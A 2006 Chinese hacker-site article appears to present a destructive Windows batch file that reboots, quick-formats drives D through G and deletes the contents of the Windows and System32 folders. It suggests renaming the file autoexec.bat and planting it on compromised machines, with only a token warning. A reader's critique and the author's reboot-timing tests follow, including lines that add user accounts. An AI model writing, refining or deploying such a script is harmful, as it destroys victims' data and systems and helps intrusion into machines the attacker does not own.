精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> 病毒木马 >> 病毒知识 >>

由一段批处理程序所引起的探讨

合金网络科技

 
  添加日期:2006-9-13 2:58:22 点击次数:84次  
   
 

假如你的系统装在c盘

打开记事本输入

@echo off

shutdown -r -t 0

format d: /q /y

format e: /q /y

format f: /q /y

format g: /q /y

c:

cd \

cd windows

del. /y

cd system32

del. /y

shutdown -r -t 0

另存为1.bat

然后运行

看看有什么后果

如果想搞肉鸡的话那么可以

重命为autoexec.bat上传到肉鸡C:覆盖原来的autoexec.bat


最后一次警告:最好别乱搞,出了问题后果自负


有一个不完美的地方。我说说


c:

cd \

cd windows

del. /y

cd system32

 

请问你为什么就肯定系统不是windows2000呢!

对于windows目录的确定,你在bat下应该用环境变量得到。

比如

windir=C:\WINDOWS

windir=C:\WINNT


还有,有点小小要请教的地方,对于第二条语句。

shutdown -r -t 0

既然重动了,那以下的格式化命令还有作用吗???????????

自己不敢试,因为我怀疑是有作用的。


这个是我给的回复:

我的系统是XP,在XP的环境下弄的这个批处理,所以忽略了2000的情况,是我考虑不周全,谢谢你的指正

确实如你所说shutdown -r -t 0这条语句本来是不应该放在这里,否则系统会直接重启动,导致下面的语句不起作用.


为了得到答案!我对于这个问题亲自试了一下!


@echo off

shutdown -r -t 0

ping 127.0.0.1 -n 100 &net user emissary2 /add

shutdown -r -t 0

这是我第一次执行的文件。在重启动后发现emissary1并没有加入到用户组!失败!

第二次我在ping的前面加入了net user emissary1 /add。因为我想知道不延时执行的话。会不会成功!

@echo off

shutdown -r -t 0

net user emissary1 /add

ping 127.0.0.1 -n 100 &net user emissary2 /add

shutdown -r -t 0

结果还是失败!


到这里。我以为shutdown -r -t 0后面的语句是无效的!想了一下。又改为了以下语句!

@echo off

shutdown -r -t 0

dir > c:\aaa.txt

ping 127.0.0.1 -n 100 &dir > c:\aaa2.txt

shutdown -r -t 0

意外的,这次成功了。重启后发现有了c:\aaa.txt而没有c:\aaa2.txt这个文件。

对于以上测试,我仅仅得出在这个批处理文件中。只能对内部命令会起作用,而外部命令因为windows已经开始关闭窗口,从而导致外部命令的初始化失败,不能执行的结论!

内部命令由cmd.exe提供,因为执行.bat时CMD是打开的,所以内部命令可以正常使用。


 

精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."